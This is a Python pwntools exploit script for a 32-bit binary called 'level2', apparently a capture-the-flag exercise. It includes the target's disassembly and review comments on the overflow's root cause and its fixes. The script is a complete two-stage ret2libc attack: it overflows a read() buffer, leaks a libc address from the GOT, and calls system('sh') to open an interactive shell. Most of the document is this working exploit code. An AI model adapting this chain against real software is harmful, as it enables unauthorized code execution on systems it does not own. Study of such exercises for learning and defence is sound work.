from pwn import * | |
# Here's the disassembly for everything | |
# NOTE(review): the listing below is a bare string literal, not executed code;
# it documents the target so the offsets used further down can be checked
# against it.
""" | |
0804844b <vulnerable_function>: | |
804844b: 55 push ebp | |
804844c: 89 e5 mov ebp,esp | |
804844e: 81 ec 88 00 00 00 sub esp,0x88 | |
8048454: 83 ec 04 sub esp,0x4 | |
8048457: 68 00 01 00 00 push 0x100 | |
804845c: 8d 85 78 ff ff ff lea eax,[ebp-0x88] | |
8048462: 50 push eax | |
8048463: 6a 00 push 0x0 | |
8048465: e8 a6 fe ff ff call 8048310 <read@plt> | |
804846a: 83 c4 10 add esp,0x10 | |
804846d: c9 leave | |
804846e: c3 ret | |
0804846f <main>: | |
804846f: 8d 4c 24 04 lea ecx,[esp+0x4] | |
8048473: 83 e4 f0 and esp,0xfffffff0 | |
8048476: ff 71 fc push DWORD PTR [ecx-0x4] | |
8048479: 55 push ebp | |
804847a: 89 e5 mov ebp,esp | |
804847c: 51 push ecx | |
804847d: 83 ec 04 sub esp,0x4 | |
8048480: e8 c6 ff ff ff call 804844b <vulnerable_function> | |
8048485: 83 ec 04 sub esp,0x4 | |
8048488: 6a 0d push 0xd | |
804848a: 68 30 85 04 08 push 0x8048530 | |
804848f: 6a 01 push 0x1 | |
8048491: e8 aa fe ff ff call 8048340 <write@plt> | |
8048496: 83 c4 10 add esp,0x10 | |
8048499: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4] | |
804849c: c9 leave | |
804849d: 8d 61 fc lea esp,[ecx-0x4] | |
80484a0: c3 ret | |
""" | |
# Root cause, as shown in vulnerable_function above: the call is
# read(0, ebp-0x88, 0x100), i.e. up to 0x100 (256) bytes are read into a
# frame that only reserves 0x88 (136) bytes below ebp, so longer input
# overwrites the saved ebp and the return address that `leave; ret` pops.
# No stack-protector check appears in the listing, and the fixed
# 0x0804xxxx addresses look like a non-PIE build (presumably; confirm
# with checksec). The code-level fix is to bound the read by the buffer
# size; a stack canary would turn the overwrite into an abort, and PIE
# would invalidate the fixed gadget/symbol addresses this script relies on.
# Load the ELF from disk so we can grab libc | |
elf = ELF('./level2') | |
libc = elf.libc | |
# Determine where stack control is by forcing a core dump. | |
# The crash of this first process is intentional: cyclic_find maps the
# value that ended up in EIP back to its offset within the 1024-byte
# de Bruijn pattern. This relies on a core file literally named 'core'
# appearing in the working directory — depends on the host's core_pattern
# and ulimit settings (TODO confirm); this first `io` is never closed.
io = process('./level2') | |
io.sendline(cyclic(1024)) | |
io.recvall() | |
core = Core('core') | |
eip = cyclic_find(core.eip) | |
log.info("EIP control @ %i" % eip) | |
# Actually exploit the process this time | |
io = process('./level2') | |
# Create a ROP stack to dump the GOT and return to main() | |
# so we can exploit again. | |
# Stage 1 leaks 4 bytes of the GOT entry for read (the resolved libc
# address) to stdout, then re-enters main(), which calls
# vulnerable_function again (see the listing), so a second overflow is
# possible. rop.dump() is a human-readable rendering of the chain.
# NOTE(review): `print rop.dump()` is Python 2 print-statement syntax.
rop = ROP(elf) | |
rop.write(1, elf.got['read'], 4) | |
rop.main() | |
print rop.dump() | |
# fit() places str(rop) at offset `eip`, padding everything before it.
# str(rop) yields raw bytes only under Python 2; Python 3 would need bytes().
io.send(fit({ | |
eip: str(rop) | |
})) | |
# Get the address of 'read' | |
# unpack() consumes the 4 leaked bytes as one little-endian word.
read = io.unpack() | |
# Adjust libc against that offset | |
# Rebases the libc ELF so its symbols resolve to this process's (ASLR'd)
# mapping; this is why the leak in stage 1 was needed.
libc.address = read - libc.symbols['read'] | |
# Get the address of system(), and build our new ROP stack. | |
# NOTE(review): .next() is the Python 2 iterator method; Python 3 would
# use next(libc.search(...)).
system = libc.symbols['system'] | |
binsh = libc.search('sh\x00').next() | |
rop = ROP(libc) | |
rop.system(binsh) | |
# Send the second ROP which gets us a shell. | |
# Same offset as stage 1: main() re-entered vulnerable_function, whose
# frame layout is unchanged.
io.send(fit({ | |
eip: str(rop) | |
})) | |
io.interactive() |